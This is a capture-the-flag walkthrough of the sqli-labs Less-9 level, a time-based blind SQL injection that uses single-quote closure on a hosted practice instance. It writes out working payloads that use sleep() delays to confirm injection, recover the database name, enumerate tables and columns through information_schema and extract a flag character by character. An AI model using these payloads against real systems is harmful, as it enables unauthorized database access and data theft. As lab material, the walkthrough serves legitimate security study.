Less-9
Less-9 GET - Blind - Time based. - Single Quotes (GET, time-based blind injection, single-quote closure)
1. Check whether the parameter is injectable
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1'
Normal page (no error message and no change in content, so the error-based and boolean-based signals of earlier levels are unavailable)
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1"
Normal page
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and sleep(3) --+
Response delayed by about 3 seconds => injectable. The only observable signal on this level is the response time, so every later test is of the form "delayed or not delayed".
2. Determine the parameter type
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1 and sleep(3) --+
Normal page, no delay (without the quote the payload stays inside the string literal and is never executed)
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and sleep(3) --+
Delayed => the parameter is a string (quoted) value, so this is a string-type injection
3. Close the quote
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and sleep(3) --+
Delayed => a single quote closes the literal and --+ (decoded to "-- ") comments out the rest of the query; the closure works
4. Guess the length of the database name
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and if(length(database())=8,sleep(3),1) --+
Delayed => the database name is 8 characters long (increase the number one at a time until the delay appears; 8 is the length of the standard sqli-labs database `security`). Note that the URL originally shown for this step was a copy of the closure test from step 3 and carries no length condition.
5. Guess the database name
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and if(left((select database()),1)='s',sleep(3),1) --+
Delayed => the first character is 's'. Repeat with left(...,2)='se', left(...,3)='sec' and so on, trying each candidate character until the response is delayed, until all 8 characters are known.
6. Guess the table names
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and if(left((select table_name from information_schema.tables where table_schema=database() limit 0,1),1)='e',sleep(3),1) --+
Delayed => the first table name starts with 'e'. Change the offset in limit (limit 1,1; limit 2,1; ...) to walk through the remaining tables, and extend left() as in step 5 to recover each full name.
7. Guess the column names
https://636-28a1490f-a0a3-4aef-9543-129e15e66b53.do-not-trust.hacking.run/?id=1' and if(left((select column_name from information_schema.columns where table_name='users' limit 0,1),1)='i',sleep(3),1) --+
Delayed => the first column of users starts with 'i'. Because this query filters only on table_name, a table of the same name in another database (information_schema, mysql, ...) can appear first; adding "and table_schema=database()" to the WHERE clause avoids that ambiguity.
8. Guess the data
?id=1' and if(left((select flag from paNrhmRA limit 0,1),1)='d',sleep(3),1) --+
Delayed => the first character of the flag is 'd'. The table paNrhmRA and its column flag are specific to this hosted instance and were found by running steps 6 and 7 with increasing limit offsets; the URL is abbreviated to the query string, the host is the same as above.